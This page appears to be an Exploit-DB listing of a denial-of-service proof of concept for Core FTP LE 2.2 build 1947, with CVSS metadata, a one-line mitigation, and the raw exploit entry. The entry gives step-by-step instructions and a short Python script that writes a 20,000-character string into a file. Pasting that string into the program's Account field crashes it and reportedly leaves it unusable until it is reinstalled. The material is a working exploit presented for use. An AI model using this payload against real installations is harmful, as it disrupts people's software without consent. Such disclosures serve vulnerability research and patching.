header-logo
Suggest Exploit
vendor:
Core FTP LE
by:
Ismael Nava
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Core FTP LE
Affected Version From: 2.2
Affected Version To: 2.2 build 1947
Patch Exists: YES
Related CWE: n/a
CPE: a:coreftp:core_ftp_le
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2020

Core FTP LE 2.2 – Denial of Service (PoC)

When a maliciously crafted file is opened in Core FTP LE 2.2, the program crashes and is unable to be reopened until it is uninstalled and reinstalled. This is due to a buffer overflow vulnerability in the program.

Mitigation:

Ensure that all software is up to date and patched to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Core FTP LE 2.2 - Denial of Service (PoC)
# Date: 2020-25-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download.html
# Version: 2.2 build 1947
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program Core FTP LE
# In File select the option Connect
# Click in the option Advanced from the fiel Host / IP / URL
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Dog.txt"
# Paste the content in the field Account
# Click in OK
# After Core FTP lE closed, the program did not work again if the user try to
# open again, so it is necessary uninstall and install again
# End :)


buffer = 'R' * 20000

try: 
    file = open("Dog.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")